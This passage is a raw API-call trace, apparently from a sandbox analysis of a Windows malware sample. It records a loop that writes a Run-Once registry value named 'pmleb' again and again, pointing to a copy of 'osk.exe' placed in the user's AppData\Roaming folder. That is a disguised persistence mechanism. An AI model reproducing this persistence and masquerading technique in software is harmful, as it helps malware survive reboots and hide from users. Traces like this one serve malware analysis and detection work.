[0096.571] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.571] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.571] SetTimer (hWnd=0x20280, nIDEvent=0x22a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a2 [0096.572] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.585] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.585] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.585] KillTimer (hWnd=0x20280, uIDEvent=0x22a2) returned 1 [0096.586] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.586] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.586] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.586] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.587] RegCloseKey (hKey=0x280) returned 0x0 [0096.587] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.587] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.587] SetTimer (hWnd=0x20280, nIDEvent=0x22a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a3 [0096.587] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.601] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.601] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.601] KillTimer (hWnd=0x20280, uIDEvent=0x22a3) returned 1 [0096.601] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.601] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.602] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.602] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.602] RegCloseKey (hKey=0x280) returned 0x0 [0096.602] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.602] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.602] SetTimer (hWnd=0x20280, nIDEvent=0x22a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a4 [0096.602] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.618] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.618] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.618] KillTimer (hWnd=0x20280, uIDEvent=0x22a4) returned 1 [0096.618] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.619] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.619] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.619] RegCloseKey (hKey=0x280) returned 0x0 [0096.619] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.619] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.620] SetTimer (hWnd=0x20280, nIDEvent=0x22a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a5 [0096.620] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.634] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.634] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.634] KillTimer (hWnd=0x20280, uIDEvent=0x22a5) returned 1 [0096.634] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.635] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.635] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.635] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.635] RegCloseKey (hKey=0x280) returned 0x0 [0096.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.635] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.635] SetTimer (hWnd=0x20280, nIDEvent=0x22a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a6 [0096.636] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.647] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.647] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.648] KillTimer (hWnd=0x20280, uIDEvent=0x22a6) returned 1 [0096.648] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.648] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.649] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.649] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.649] RegCloseKey (hKey=0x280) returned 0x0 [0096.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.649] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.649] SetTimer (hWnd=0x20280, nIDEvent=0x22a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a7 [0096.649] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.663] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.663] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.663] KillTimer (hWnd=0x20280, uIDEvent=0x22a7) returned 1 [0096.664] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.664] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.664] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.665] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.665] RegCloseKey (hKey=0x280) returned 0x0 [0096.665] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0096.665] SetTimer (hWnd=0x20280, nIDEvent=0x22a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a8 [0096.665] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.679] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.679] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.680] KillTimer (hWnd=0x20280, uIDEvent=0x22a8) returned 1 [0096.680] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.680] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.680] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.681] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.681] RegCloseKey (hKey=0x280) returned 0x0 [0096.681] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.681] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.681] SetTimer (hWnd=0x20280, nIDEvent=0x22a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a9 [0096.681] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.694] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.694] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.694] KillTimer (hWnd=0x20280, uIDEvent=0x22a9) returned 1 [0096.695] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.695] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.695] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.696] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.696] RegCloseKey (hKey=0x280) returned 0x0 [0096.696] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.696] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.696] SetTimer (hWnd=0x20280, nIDEvent=0x22aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x22aa [0096.696] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.734] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.734] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.734] KillTimer (hWnd=0x20280, uIDEvent=0x22aa) returned 1 [0096.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.735] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.735] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.735] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.736] RegCloseKey (hKey=0x280) returned 0x0 [0096.736] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.736] SetTimer (hWnd=0x20280, nIDEvent=0x22ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ab 
[0096.736] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.741] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.741] KillTimer (hWnd=0x20280, uIDEvent=0x22ab) returned 1 [0096.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.742] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.742] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.742] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.742] RegCloseKey (hKey=0x280) returned 0x0 [0096.742] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.743] SetTimer (hWnd=0x20280, nIDEvent=0x22ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ac [0096.743] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.757] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.757] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.757] KillTimer (hWnd=0x20280, uIDEvent=0x22ac) returned 1 [0096.757] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.757] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.758] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.758] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.758] RegCloseKey (hKey=0x280) returned 0x0 [0096.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.758] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.758] SetTimer (hWnd=0x20280, nIDEvent=0x22ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ad [0096.758] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.772] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.772] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.773] KillTimer (hWnd=0x20280, uIDEvent=0x22ad) returned 1 [0096.773] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.773] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.773] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.773] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.774] RegCloseKey (hKey=0x280) returned 0x0 [0096.774] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.774] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.774] SetTimer (hWnd=0x20280, nIDEvent=0x22ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ae [0096.774] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0096.788] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.788] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.788] KillTimer (hWnd=0x20280, uIDEvent=0x22ae) returned 1 [0096.789] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.789] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.789] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.789] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.789] RegCloseKey (hKey=0x280) returned 0x0 [0096.790] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.790] SetTimer (hWnd=0x20280, nIDEvent=0x22af, uElapse=0xa, lpTimerFunc=0x0) returned 0x22af [0096.790] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.803] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.804] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.804] KillTimer (hWnd=0x20280, uIDEvent=0x22af) returned 1 [0096.804] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.804] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.805] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.805] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.805] RegCloseKey (hKey=0x280) returned 0x0 [0096.805] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.805] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.805] SetTimer (hWnd=0x20280, nIDEvent=0x22b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b0 [0096.805] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.819] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.819] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.820] KillTimer (hWnd=0x20280, uIDEvent=0x22b0) returned 1 [0096.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.820] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.820] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.821] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.821] RegCloseKey (hKey=0x280) returned 0x0 [0096.821] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.821] SetTimer (hWnd=0x20280, nIDEvent=0x22b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b1 [0096.821] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.835] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.835] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.835] KillTimer (hWnd=0x20280, uIDEvent=0x22b1) returned 1 [0096.835] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.835] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.835] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.836] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.836] RegCloseKey (hKey=0x280) returned 0x0 [0096.836] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.836] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.836] SetTimer (hWnd=0x20280, nIDEvent=0x22b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b2 [0096.836] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.850] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.850] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.850] KillTimer (hWnd=0x20280, uIDEvent=0x22b2) returned 1 [0096.851] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.851] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.851] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.851] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.852] RegCloseKey (hKey=0x280) returned 0x0 [0096.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.852] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.852] SetTimer (hWnd=0x20280, nIDEvent=0x22b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b3 [0096.852] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.866] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.866] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.866] KillTimer (hWnd=0x20280, uIDEvent=0x22b3) returned 1 [0096.866] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.867] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.867] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.867] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.867] RegCloseKey (hKey=0x280) returned 0x0 [0096.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.868] SetTimer (hWnd=0x20280, nIDEvent=0x22b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b4 [0096.868] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.882] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.882] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.882] KillTimer (hWnd=0x20280, 
